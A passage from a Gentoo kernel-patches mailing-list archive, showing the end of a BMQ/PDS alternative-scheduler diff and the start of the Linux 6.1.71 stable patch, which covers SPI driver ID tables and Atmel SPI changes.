-+static inline void update_rq_time_edge(struct rq *rq)
-+{
-+	struct list_head head;
-+	u64 old = rq->time_edge;
-+	u64 now = rq->clock >> sched_timeslice_shift;
-+	u64 prio, delta;
-+
-+	if (now == old)
-+		return;
-+
-+	delta = min_t(u64, NORMAL_PRIO_NUM, now - old);
-+	INIT_LIST_HEAD(&head);
-+
-+	for_each_set_bit(prio, &rq->queue.bitmap[2], delta)
-+		list_splice_tail_init(rq->queue.heads + MIN_NORMAL_PRIO +
-+				      NORMAL_PRIO_MOD(prio + old), &head);
-+
-+	rq->queue.bitmap[2] = (NORMAL_PRIO_NUM == delta) ? 0UL :
-+		rq->queue.bitmap[2] >> delta;
-+	rq->time_edge = now;
-+	if (!list_empty(&head)) {
-+		u64 idx = MIN_NORMAL_PRIO + NORMAL_PRIO_MOD(now);
-+		struct task_struct *p;
-+
-+		list_for_each_entry(p, &head, sq_node)
-+			p->sq_idx = idx;
-+
-+		list_splice(&head, rq->queue.heads + idx);
-+		rq->queue.bitmap[2] |= 1UL;
-+	}
-+}
-+
-+static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
-+{
-+	p->time_slice = sched_timeslice_ns;
-+	sched_renew_deadline(p, rq);
-+	if (SCHED_FIFO != p->policy && task_on_rq_queued(p))
-+		requeue_task(p, rq, task_sched_prio_idx(p, rq));
-+}
-+
-+static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq)
-+{
-+	u64 max_dl = rq->time_edge + NICE_WIDTH - 1;
-+	if (unlikely(p->deadline > max_dl))
-+		p->deadline = max_dl;
-+}
-+
-+static void sched_task_fork(struct task_struct *p, struct rq *rq)
-+{
-+	sched_renew_deadline(p, rq);
-+}
-+
-+static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
-+{
-+	time_slice_expired(p, rq);
-+}
-+
-+#ifdef CONFIG_SMP
-+static inline void sched_task_ttwu(struct task_struct *p) {}
-+#endif
-+static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq) {}
-diff --git a/kernel/sched/pelt.c b/kernel/sched/pelt.c
-index 0f310768260c..bd38bf738fe9 100644
---- a/kernel/sched/pelt.c
-+++ b/kernel/sched/pelt.c
-@@ -266,6 +266,7 @@ ___update_load_avg(struct sched_avg *sa, unsigned long load)
- 	WRITE_ONCE(sa->util_avg, sa->util_sum / divider);
- }
-
-+#ifndef CONFIG_SCHED_ALT
- /*
-  * sched_entity:
-  *
-@@ -383,8 +384,9 @@ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
-
- 	return 0;
- }
-+#endif
-
--#ifdef CONFIG_SCHED_THERMAL_PRESSURE
-+#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
- /*
-  * thermal:
-  *
-diff --git a/kernel/sched/pelt.h b/kernel/sched/pelt.h
-index 3a0e0dc28721..e8a7d84aa5a5 100644
---- a/kernel/sched/pelt.h
-+++ b/kernel/sched/pelt.h
-@@ -1,13 +1,15 @@
- #ifdef CONFIG_SMP
- #include "sched-pelt.h"
-
-+#ifndef CONFIG_SCHED_ALT
- int __update_load_avg_blocked_se(u64 now, struct sched_entity *se);
- int __update_load_avg_se(u64 now, struct cfs_rq *cfs_rq, struct sched_entity *se);
- int __update_load_avg_cfs_rq(u64 now, struct cfs_rq *cfs_rq);
- int update_rt_rq_load_avg(u64 now, struct rq *rq, int running);
- int update_dl_rq_load_avg(u64 now, struct rq *rq, int running);
-+#endif
-
--#ifdef CONFIG_SCHED_THERMAL_PRESSURE
-+#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
- int update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity);
-
- static inline u64 thermal_load_avg(struct rq *rq)
-@@ -44,6 +46,7 @@ static inline u32 get_pelt_divider(struct sched_avg *avg)
- 	return PELT_MIN_DIVIDER + avg->period_contrib;
- }
-
-+#ifndef CONFIG_SCHED_ALT
- static inline void cfs_se_util_change(struct sched_avg *avg)
- {
- 	unsigned int enqueued;
-@@ -180,9 +183,11 @@ static inline u64 cfs_rq_clock_pelt(struct cfs_rq *cfs_rq)
- 	return rq_clock_pelt(rq_of(cfs_rq));
- }
- #endif
-+#endif /* CONFIG_SCHED_ALT */
-
- #else
-
-+#ifndef CONFIG_SCHED_ALT
- static inline int
- update_cfs_rq_load_avg(u64 now, struct cfs_rq *cfs_rq)
- {
-@@ -200,6 +205,7 @@ update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
- {
- 	return 0;
- }
-+#endif
-
- static inline int
- update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity)
-diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
-index a4a20046e586..c363693cd869 100644
---- a/kernel/sched/sched.h
-+++ b/kernel/sched/sched.h
-@@ -5,6 +5,10 @@
- #ifndef _KERNEL_SCHED_SCHED_H
- #define _KERNEL_SCHED_SCHED_H
-
-+#ifdef CONFIG_SCHED_ALT
-+#include "alt_sched.h"
-+#else
-+
- #include <linux/sched/affinity.h>
- #include <linux/sched/autogroup.h>
- #include <linux/sched/cpufreq.h>
-@@ -3183,4 +3187,9 @@ static inline void update_current_exec_runtime(struct task_struct *curr,
- 	cgroup_account_cputime(curr, delta_exec);
- }
-
-+static inline int task_running_nice(struct task_struct *p)
-+{
-+	return (task_nice(p) > 0);
-+}
-+#endif /* !CONFIG_SCHED_ALT */
- #endif /* _KERNEL_SCHED_SCHED_H */
-diff --git a/kernel/sched/stats.c b/kernel/sched/stats.c
-index 857f837f52cb..5486c63e4790 100644
---- a/kernel/sched/stats.c
-+++ b/kernel/sched/stats.c
-@@ -125,8 +125,10 @@ static int show_schedstat(struct seq_file *seq, void *v)
- 	} else {
- 		struct rq *rq;
- #ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- 		struct sched_domain *sd;
- 		int dcount = 0;
-+#endif
- #endif
- 		cpu = (unsigned long)(v - 2);
- 		rq = cpu_rq(cpu);
-@@ -143,6 +145,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
- 		seq_printf(seq, "\n");
-
- #ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- 		/* domain-specific stats */
- 		rcu_read_lock();
- 		for_each_domain(cpu, sd) {
-@@ -171,6 +174,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
- 			    sd->ttwu_move_balance);
- 		}
- 		rcu_read_unlock();
-+#endif
- #endif
- 	}
- 	return 0;
-diff --git a/kernel/sched/stats.h b/kernel/sched/stats.h
-index 84a188913cc9..53934e7ef5db 100644
---- a/kernel/sched/stats.h
-+++ b/kernel/sched/stats.h
-@@ -89,6 +89,7 @@ static inline void rq_sched_info_depart  (struct rq *rq, unsigned long long delt
-
- #endif /* CONFIG_SCHEDSTATS */
-
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_FAIR_GROUP_SCHED
- struct sched_entity_stats {
- 	struct sched_entity     se;
-@@ -105,6 +106,7 @@ __schedstats_from_se(struct sched_entity *se)
- #endif
- 	return &task_of(se)->stats;
- }
-+#endif /* CONFIG_SCHED_ALT */
-
- #ifdef CONFIG_PSI
- void psi_task_change(struct task_struct *task, int clear, int set);
-diff --git a/kernel/sched/topology.c b/kernel/sched/topology.c
-index 8739c2a5a54e..d8dd6c15eb47 100644
---- a/kernel/sched/topology.c
-+++ b/kernel/sched/topology.c
-@@ -3,6 +3,7 @@
-  * Scheduler topology setup/handling methods
-  */
-
-+#ifndef CONFIG_SCHED_ALT
- DEFINE_MUTEX(sched_domains_mutex);
-
- /* Protected by sched_domains_mutex: */
-@@ -1413,8 +1414,10 @@ static void asym_cpu_capacity_scan(void)
-  */
-
- static int default_relax_domain_level = -1;
-+#endif /* CONFIG_SCHED_ALT */
- int sched_domain_level_max;
-
-+#ifndef CONFIG_SCHED_ALT
- static int __init setup_relax_domain_level(char *str)
- {
- 	if (kstrtoint(str, 0, &default_relax_domain_level))
-@@ -1647,6 +1650,7 @@ sd_init(struct sched_domain_topology_level *tl,
-
- 	return sd;
- }
-+#endif /* CONFIG_SCHED_ALT */
-
- /*
-  * Topology list, bottom-up.
-@@ -1683,6 +1687,7 @@ void set_sched_topology(struct sched_domain_topology_level *tl)
- 	sched_domain_topology_saved = NULL;
- }
-
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_NUMA
-
- static const struct cpumask *sd_numa_mask(int cpu)
-@@ -2645,3 +2650,15 @@ void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
- 	partition_sched_domains_locked(ndoms_new, doms_new, dattr_new);
- 	mutex_unlock(&sched_domains_mutex);
- }
-+#else /* CONFIG_SCHED_ALT */
-+void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
-+			     struct sched_domain_attr *dattr_new)
-+{}
-+
-+#ifdef CONFIG_NUMA
-+int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
-+{
-+	return best_mask_cpu(cpu, cpus);
-+}
-+#endif /* CONFIG_NUMA */
-+#endif
-diff --git a/kernel/sysctl.c b/kernel/sysctl.c
-index c6d9dec11b74..2bc42ce8b48e 100644
---- a/kernel/sysctl.c
-+++ b/kernel/sysctl.c
-@@ -93,6 +93,10 @@ EXPORT_SYMBOL_GPL(sysctl_long_vals);
-
- /* Constants used for minimum and maximum */
-
-+#ifdef CONFIG_SCHED_ALT
-+extern int sched_yield_type;
-+#endif
-+
- #ifdef CONFIG_PERF_EVENTS
- static const int six_hundred_forty_kb = 640 * 1024;
- #endif
-@@ -1633,6 +1637,7 @@ int proc_do_static_key(struct ctl_table *table, int write,
- }
-
- static struct ctl_table kern_table[] = {
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_NUMA_BALANCING
- 	{
- 		.procname	= "numa_balancing",
-@@ -1652,6 +1657,7 @@ static struct ctl_table kern_table[] = {
- 		.extra1		= SYSCTL_ZERO,
- 	},
- #endif /* CONFIG_NUMA_BALANCING */
-+#endif /* !CONFIG_SCHED_ALT */
- 	{
- 		.procname	= "panic",
- 		.data		= &panic_timeout,
-@@ -1953,6 +1959,17 @@ static struct ctl_table kern_table[] = {
- 		.proc_handler	= proc_dointvec,
- 	},
- #endif
-+#ifdef CONFIG_SCHED_ALT
-+	{
-+		.procname	= "yield_type",
-+		.data		= &sched_yield_type,
-+		.maxlen		= sizeof (int),
-+		.mode		= 0644,
-+		.proc_handler	= &proc_dointvec_minmax,
-+		.extra1		= SYSCTL_ZERO,
-+		.extra2		= SYSCTL_TWO,
-+	},
-+#endif
- #if defined(CONFIG_S390) && defined(CONFIG_SMP)
- 	{
- 		.procname	= "spin_retry",
-diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
-index 3ae661ab6260..35f0176dcdb0 100644
---- a/kernel/time/hrtimer.c
-+++ b/kernel/time/hrtimer.c
-@@ -2088,8 +2088,10 @@ long hrtimer_nanosleep(ktime_t rqtp, const enum hrtimer_mode mode,
- 	int ret = 0;
- 	u64 slack;
-
-+#ifndef CONFIG_SCHED_ALT
- 	slack = current->timer_slack_ns;
- 	if (dl_task(current) || rt_task(current))
-+#endif
- 		slack = 0;
-
- 	hrtimer_init_sleeper_on_stack(&t, clockid, mode);
-diff --git a/kernel/time/posix-cpu-timers.c b/kernel/time/posix-cpu-timers.c
-index cb925e8ef9a8..67d823510f5c 100644
---- a/kernel/time/posix-cpu-timers.c
-+++ b/kernel/time/posix-cpu-timers.c
-@@ -223,7 +223,7 @@ static void task_sample_cputime(struct task_struct *p, u64 *samples)
- 	u64 stime, utime;
-
- 	task_cputime(p, &utime, &stime);
--	store_samples(samples, stime, utime, p->se.sum_exec_runtime);
-+	store_samples(samples, stime, utime, tsk_seruntime(p));
- }
-
- static void proc_sample_cputime_atomic(struct task_cputime_atomic *at,
-@@ -866,6 +866,7 @@ static void collect_posix_cputimers(struct posix_cputimers *pct, u64 *samples,
- 	}
- }
-
-+#ifndef CONFIG_SCHED_ALT
- static inline void check_dl_overrun(struct task_struct *tsk)
- {
- 	if (tsk->dl.dl_overrun) {
-@@ -873,6 +874,7 @@ static inline void check_dl_overrun(struct task_struct *tsk)
- 		send_signal_locked(SIGXCPU, SEND_SIG_PRIV, tsk, PIDTYPE_TGID);
- 	}
- }
-+#endif
-
- static bool check_rlimit(u64 time, u64 limit, int signo, bool rt, bool hard)
- {
-@@ -900,8 +902,10 @@ static void check_thread_timers(struct task_struct *tsk,
- 	u64 samples[CPUCLOCK_MAX];
- 	unsigned long soft;
-
-+#ifndef CONFIG_SCHED_ALT
- 	if (dl_task(tsk))
- 		check_dl_overrun(tsk);
-+#endif
-
- 	if (expiry_cache_is_inactive(pct))
- 		return;
-@@ -915,7 +919,7 @@ static void check_thread_timers(struct task_struct *tsk,
- 	soft = task_rlimit(tsk, RLIMIT_RTTIME);
- 	if (soft != RLIM_INFINITY) {
- 		/* Task RT timeout is accounted in jiffies. RTTIME is usec */
--		unsigned long rttime = tsk->rt.timeout * (USEC_PER_SEC / HZ);
-+		unsigned long rttime = tsk_rttimeout(tsk) * (USEC_PER_SEC / HZ);
- 		unsigned long hard = task_rlimit_max(tsk, RLIMIT_RTTIME);
-
- 		/* At the hard limit, send SIGKILL. No further action. */
-@@ -1151,8 +1155,10 @@ static inline bool fastpath_timer_check(struct task_struct *tsk)
- 			return true;
- 	}
-
-+#ifndef CONFIG_SCHED_ALT
- 	if (dl_task(tsk) && tsk->dl.dl_overrun)
- 		return true;
-+#endif
-
- 	return false;
- }
-diff --git a/kernel/trace/trace_selftest.c b/kernel/trace/trace_selftest.c
-index a2d301f58ced..2ccdede8585c 100644
---- a/kernel/trace/trace_selftest.c
-+++ b/kernel/trace/trace_selftest.c
-@@ -1143,10 +1143,15 @@ static int trace_wakeup_test_thread(void *data)
- {
- 	/* Make this a -deadline thread */
- 	static const struct sched_attr attr = {
-+#ifdef CONFIG_SCHED_ALT
-+		/* No deadline on BMQ/PDS, use RR */
-+		.sched_policy = SCHED_RR,
-+#else
- 		.sched_policy = SCHED_DEADLINE,
- 		.sched_runtime = 100000ULL,
- 		.sched_deadline = 10000000ULL,
- 		.sched_period = 10000000ULL
-+#endif
- 	};
- 	struct wakeup_test_data *x = data;
-
-diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
-index 03772805e4f9f1bf881740c8dd14aef667fbecf2..4742bbdfb2d715a439c0d505b4f293a82b76b255 100644
---- a/kernel/sched/alt_core.c
-+++ b/kernel/sched/alt_core.c
-@@ -5661,9 +5661,6 @@ static int __sched_setscheduler(struct task_struct *p,
- 			return retval;
- 	}
-
--	if (pi)
--		cpuset_read_lock();
--
- 	/*
- 	 * Make sure no PI-waiters arrive (or leave) while we are
- 	 * changing the priority of the task:
-@@ -5709,8 +5706,6 @@ static int __sched_setscheduler(struct task_struct *p,
- 		policy = oldpolicy = -1;
- 		__task_access_unlock(p, lock);
- 		raw_spin_unlock_irqrestore(&p->pi_lock, flags);
--		if (pi)
--			cpuset_read_unlock();
- 		goto recheck;
- 	}
-
-@@ -5741,10 +5736,8 @@ static int __sched_setscheduler(struct task_struct *p,
- 	__task_access_unlock(p, lock);
- 	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-
--	if (pi) {
--		cpuset_read_unlock();
-+	if (pi)
- 		rt_mutex_adjust_pi(p);
--	}
-
- 	/* Run balance callbacks after we've adjusted the PI chain: */
- 	balance_callbacks(rq, head);
-@@ -5755,8 +5748,6 @@ static int __sched_setscheduler(struct task_struct *p,
- unlock:
- 	__task_access_unlock(p, lock);
- 	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
--	if (pi)
--		cpuset_read_unlock();
- 	return retval;
- }
-
-diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
-index 2f6606f4a3ec941f78b85a8ff997f2a6c0405218..71f5da268ee8e597ee15b2b440b4a80f8a6adb1c 100644
---- a/kernel/cgroup/cpuset.c
-+++ b/kernel/cgroup/cpuset.c
-@@ -2509,12 +2509,15 @@ static int cpuset_can_attach(struct cgroup_taskset *tset)
- 		if (ret)
- 			goto out_unlock;
-
-+#ifndef CONFIG_SCHED_ALT
- 		if (dl_task(task)) {
- 			cs->nr_migrate_dl_tasks++;
- 			cs->sum_migrate_dl_bw += task->dl.dl_bw;
- 		}
-+#endif
- 	}
-
-+#ifndef CONFIG_SCHED_ALT
- 	if (!cs->nr_migrate_dl_tasks)
- 		goto out_success;
-
-@@ -2535,6 +2538,7 @@ static int cpuset_can_attach(struct cgroup_taskset *tset)
- 	}
-
- out_success:
-+#endif
- 	/*
- 	 * Mark attach is in progress.  This makes validate_change() fail
- 	 * changes which zero cpus/mems_allowed.
-@@ -2558,12 +2562,14 @@ static void cpuset_cancel_attach(struct cgroup_taskset *tset)
- 	if (!cs->attach_in_progress)
- 		wake_up(&cpuset_attach_wq);
-
-+#ifndef CONFIG_SCHED_ALT
- 	if (cs->nr_migrate_dl_tasks) {
- 		int cpu = cpumask_any(cs->effective_cpus);
-
- 		dl_bw_free(cpu, cs->sum_migrate_dl_bw);
- 		reset_migrate_dl_data(cs);
- 	}
-+#endif
-
- 	mutex_unlock(&cpuset_mutex);
- }
-diff --git a/kernel/sched/alt_core.c b/kernel/sched/alt_core.c
-index 4742bbdfb2d715a439c0d505b4f293a82b76b255..8badb54c7d7b00bba30dbbd7206feeafbf919af2 100644
---- a/kernel/sched/alt_core.c
-+++ b/kernel/sched/alt_core.c
-@@ -7156,8 +7156,7 @@ int cpuset_cpumask_can_shrink(const struct cpumask __maybe_unused *cur,
- 	return 1;
- }
-
--int task_can_attach(struct task_struct *p,
--		    const struct cpumask *cs_effective_cpus)
-+int task_can_attach(struct task_struct *p)
- {
- 	int ret = 0;
-


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-01-05 14:50 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-01-05 14:50 UTC (permalink / raw
  To: gentoo-commits

commit:     2f071d103f4ef6bb3b35c2fa3533ff191c10b995
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Jan  5 14:49:49 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Jan  5 14:49:49 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2f071d10

Linux patch 6.1.71

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1070_linux-6.1.71.patch | 7517 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 7521 insertions(+)

diff --git a/0000_README b/0000_README
index 9c608802..b95d2a2c 100644
--- a/0000_README
+++ b/0000_README
@@ -323,6 +323,10 @@ Patch:  1069_linux-6.1.70.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.70
 
+Patch:  1070_linux-6.1.71.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.71
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1070_linux-6.1.71.patch b/1070_linux-6.1.71.patch
new file mode 100644
index 00000000..b085fc4d
--- /dev/null
+++ b/1070_linux-6.1.71.patch
@@ -0,0 +1,7517 @@
+diff --git a/Makefile b/Makefile
+index 270593fcafdcd..2840e36fd5596 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 70
++SUBLEVEL = 71
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/am33xx.dtsi b/arch/arm/boot/dts/am33xx.dtsi
+index 32d397b3950b9..b2e7f6a710740 100644
+--- a/arch/arm/boot/dts/am33xx.dtsi
++++ b/arch/arm/boot/dts/am33xx.dtsi
+@@ -349,6 +349,7 @@
+ 					<SYSC_IDLE_NO>,
+ 					<SYSC_IDLE_SMART>,
+ 					<SYSC_IDLE_SMART_WKUP>;
++			ti,sysc-delay-us = <2>;
+ 			clocks = <&l3s_clkctrl AM3_L3S_USB_OTG_HS_CLKCTRL 0>;
+ 			clock-names = "fck";
+ 			#address-cells = <1>;
+diff --git a/drivers/base/property.c b/drivers/base/property.c
+index b0c40d9734847..eb9b01c2ff1d9 100644
+--- a/drivers/base/property.c
++++ b/drivers/base/property.c
+@@ -17,12 +17,19 @@
+ #include <linux/property.h>
+ #include <linux/phy.h>
+ 
+-struct fwnode_handle *dev_fwnode(const struct device *dev)
++struct fwnode_handle *__dev_fwnode(struct device *dev)
+ {
+ 	return IS_ENABLED(CONFIG_OF) && dev->of_node ?
+ 		of_fwnode_handle(dev->of_node) : dev->fwnode;
+ }
+-EXPORT_SYMBOL_GPL(dev_fwnode);
++EXPORT_SYMBOL_GPL(__dev_fwnode);
++
++const struct fwnode_handle *__dev_fwnode_const(const struct device *dev)
++{
++	return IS_ENABLED(CONFIG_OF) && dev->of_node ?
++		of_fwnode_handle(dev->of_node) : dev->fwnode;
++}
++EXPORT_SYMBOL_GPL(__dev_fwnode_const);
+ 
+ /**
+  * device_property_present - check if a property of a device is present
+diff --git a/drivers/iio/imu/adis16475.c b/drivers/iio/imu/adis16475.c
+index aec55f7e1f260..2d939773445d7 100644
+--- a/drivers/iio/imu/adis16475.c
++++ b/drivers/iio/imu/adis16475.c
+@@ -1243,50 +1243,6 @@ static int adis16475_config_irq_pin(struct adis16475 *st)
+ 	return 0;
+ }
+ 
+-static const struct of_device_id adis16475_of_match[] = {
+-	{ .compatible = "adi,adis16470",
+-		.data = &adis16475_chip_info[ADIS16470] },
+-	{ .compatible = "adi,adis16475-1",
+-		.data = &adis16475_chip_info[ADIS16475_1] },
+-	{ .compatible = "adi,adis16475-2",
+-		.data = &adis16475_chip_info[ADIS16475_2] },
+-	{ .compatible = "adi,adis16475-3",
+-		.data = &adis16475_chip_info[ADIS16475_3] },
+-	{ .compatible = "adi,adis16477-1",
+-		.data = &adis16475_chip_info[ADIS16477_1] },
+-	{ .compatible = "adi,adis16477-2",
+-		.data = &adis16475_chip_info[ADIS16477_2] },
+-	{ .compatible = "adi,adis16477-3",
+-		.data = &adis16475_chip_info[ADIS16477_3] },
+-	{ .compatible = "adi,adis16465-1",
+-		.data = &adis16475_chip_info[ADIS16465_1] },
+-	{ .compatible = "adi,adis16465-2",
+-		.data = &adis16475_chip_info[ADIS16465_2] },
+-	{ .compatible = "adi,adis16465-3",
+-		.data = &adis16475_chip_info[ADIS16465_3] },
+-	{ .compatible = "adi,adis16467-1",
+-		.data = &adis16475_chip_info[ADIS16467_1] },
+-	{ .compatible = "adi,adis16467-2",
+-		.data = &adis16475_chip_info[ADIS16467_2] },
+-	{ .compatible = "adi,adis16467-3",
+-		.data = &adis16475_chip_info[ADIS16467_3] },
+-	{ .compatible = "adi,adis16500",
+-		.data = &adis16475_chip_info[ADIS16500] },
+-	{ .compatible = "adi,adis16505-1",
+-		.data = &adis16475_chip_info[ADIS16505_1] },
+-	{ .compatible = "adi,adis16505-2",
+-		.data = &adis16475_chip_info[ADIS16505_2] },
+-	{ .compatible = "adi,adis16505-3",
+-		.data = &adis16475_chip_info[ADIS16505_3] },
+-	{ .compatible = "adi,adis16507-1",
+-		.data = &adis16475_chip_info[ADIS16507_1] },
+-	{ .compatible = "adi,adis16507-2",
+-		.data = &adis16475_chip_info[ADIS16507_2] },
+-	{ .compatible = "adi,adis16507-3",
+-		.data = &adis16475_chip_info[ADIS16507_3] },
+-	{ },
+-};
+-MODULE_DEVICE_TABLE(of, adis16475_of_match);
+ 
+ static int adis16475_probe(struct spi_device *spi)
+ {
+@@ -1300,7 +1256,7 @@ static int adis16475_probe(struct spi_device *spi)
+ 
+ 	st = iio_priv(indio_dev);
+ 
+-	st->info = device_get_match_data(&spi->dev);
++	st->info = spi_get_device_match_data(spi);
+ 	if (!st->info)
+ 		return -EINVAL;
+ 
+@@ -1340,12 +1296,83 @@ static int adis16475_probe(struct spi_device *spi)
+ 	return 0;
+ }
+ 
++static const struct of_device_id adis16475_of_match[] = {
++	{ .compatible = "adi,adis16470",
++		.data = &adis16475_chip_info[ADIS16470] },
++	{ .compatible = "adi,adis16475-1",
++		.data = &adis16475_chip_info[ADIS16475_1] },
++	{ .compatible = "adi,adis16475-2",
++		.data = &adis16475_chip_info[ADIS16475_2] },
++	{ .compatible = "adi,adis16475-3",
++		.data = &adis16475_chip_info[ADIS16475_3] },
++	{ .compatible = "adi,adis16477-1",
++		.data = &adis16475_chip_info[ADIS16477_1] },
++	{ .compatible = "adi,adis16477-2",
++		.data = &adis16475_chip_info[ADIS16477_2] },
++	{ .compatible = "adi,adis16477-3",
++		.data = &adis16475_chip_info[ADIS16477_3] },
++	{ .compatible = "adi,adis16465-1",
++		.data = &adis16475_chip_info[ADIS16465_1] },
++	{ .compatible = "adi,adis16465-2",
++		.data = &adis16475_chip_info[ADIS16465_2] },
++	{ .compatible = "adi,adis16465-3",
++		.data = &adis16475_chip_info[ADIS16465_3] },
++	{ .compatible = "adi,adis16467-1",
++		.data = &adis16475_chip_info[ADIS16467_1] },
++	{ .compatible = "adi,adis16467-2",
++		.data = &adis16475_chip_info[ADIS16467_2] },
++	{ .compatible = "adi,adis16467-3",
++		.data = &adis16475_chip_info[ADIS16467_3] },
++	{ .compatible = "adi,adis16500",
++		.data = &adis16475_chip_info[ADIS16500] },
++	{ .compatible = "adi,adis16505-1",
++		.data = &adis16475_chip_info[ADIS16505_1] },
++	{ .compatible = "adi,adis16505-2",
++		.data = &adis16475_chip_info[ADIS16505_2] },
++	{ .compatible = "adi,adis16505-3",
++		.data = &adis16475_chip_info[ADIS16505_3] },
++	{ .compatible = "adi,adis16507-1",
++		.data = &adis16475_chip_info[ADIS16507_1] },
++	{ .compatible = "adi,adis16507-2",
++		.data = &adis16475_chip_info[ADIS16507_2] },
++	{ .compatible = "adi,adis16507-3",
++		.data = &adis16475_chip_info[ADIS16507_3] },
++	{ },
++};
++MODULE_DEVICE_TABLE(of, adis16475_of_match);
++
++static const struct spi_device_id adis16475_ids[] = {
++	{ "adis16470", (kernel_ulong_t)&adis16475_chip_info[ADIS16470] },
++	{ "adis16475-1", (kernel_ulong_t)&adis16475_chip_info[ADIS16475_1] },
++	{ "adis16475-2", (kernel_ulong_t)&adis16475_chip_info[ADIS16475_2] },
++	{ "adis16475-3", (kernel_ulong_t)&adis16475_chip_info[ADIS16475_3] },
++	{ "adis16477-1", (kernel_ulong_t)&adis16475_chip_info[ADIS16477_1] },
++	{ "adis16477-2", (kernel_ulong_t)&adis16475_chip_info[ADIS16477_2] },
++	{ "adis16477-3", (kernel_ulong_t)&adis16475_chip_info[ADIS16477_3] },
++	{ "adis16465-1", (kernel_ulong_t)&adis16475_chip_info[ADIS16465_1] },
++	{ "adis16465-2", (kernel_ulong_t)&adis16475_chip_info[ADIS16465_2] },
++	{ "adis16465-3", (kernel_ulong_t)&adis16475_chip_info[ADIS16465_3] },
++	{ "adis16467-1", (kernel_ulong_t)&adis16475_chip_info[ADIS16467_1] },
++	{ "adis16467-2", (kernel_ulong_t)&adis16475_chip_info[ADIS16467_2] },
++	{ "adis16467-3", (kernel_ulong_t)&adis16475_chip_info[ADIS16467_3] },
++	{ "adis16500", (kernel_ulong_t)&adis16475_chip_info[ADIS16500] },
++	{ "adis16505-1", (kernel_ulong_t)&adis16475_chip_info[ADIS16505_1] },
++	{ "adis16505-2", (kernel_ulong_t)&adis16475_chip_info[ADIS16505_2] },
++	{ "adis16505-3", (kernel_ulong_t)&adis16475_chip_info[ADIS16505_3] },
++	{ "adis16507-1", (kernel_ulong_t)&adis16475_chip_info[ADIS16507_1] },
++	{ "adis16507-2", (kernel_ulong_t)&adis16475_chip_info[ADIS16507_2] },
++	{ "adis16507-3", (kernel_ulong_t)&adis16475_chip_info[ADIS16507_3] },
++	{ }
++};
++MODULE_DEVICE_TABLE(spi, adis16475_ids);
++
+ static struct spi_driver adis16475_driver = {
+ 	.driver = {
+ 		.name = "adis16475",
+ 		.of_match_table = adis16475_of_match,
+ 	},
+ 	.probe = adis16475_probe,
++	.id_table = adis16475_ids,
+ };
+ module_spi_driver(adis16475_driver);
+ 
+diff --git a/drivers/spi/spi-atmel.c b/drivers/spi/spi-atmel.c
+index c4f22d50dba58..78daf2b2143c5 100644
+--- a/drivers/spi/spi-atmel.c
++++ b/drivers/spi/spi-atmel.c
+@@ -22,6 +22,7 @@
+ #include <linux/gpio/consumer.h>
+ #include <linux/pinctrl/consumer.h>
+ #include <linux/pm_runtime.h>
++#include <linux/iopoll.h>
+ #include <trace/events/spi.h>
+ 
+ /* SPI register offsets */
+@@ -278,6 +279,7 @@ struct atmel_spi {
+ 	bool			keep_cs;
+ 
+ 	u32			fifo_size;
++	bool			last_polarity;
+ 	u8			native_cs_free;
+ 	u8			native_cs_for_gpio;
+ };
+@@ -290,6 +292,22 @@ struct atmel_spi_device {
+ #define SPI_MAX_DMA_XFER	65535 /* true for both PDC and DMA */
+ #define INVALID_DMA_ADDRESS	0xffffffff
+ 
++/*
++ * This frequency can be anything supported by the controller, but to avoid
++ * unnecessary delay, the highest possible frequency is chosen.
++ *
++ * This frequency is the highest possible which is not interfering with other
++ * chip select registers (see Note for Serial Clock Bit Rate configuration in
++ * Atmel-11121F-ATARM-SAMA5D3-Series-Datasheet_02-Feb-16, page 1283)
++ */
++#define DUMMY_MSG_FREQUENCY	0x02
++/*
++ * 8 bits is the minimum data the controller is capable of sending.
++ *
++ * This message can be anything as it should not be treated by any SPI device.
++ */
++#define DUMMY_MSG		0xAA
++
+ /*
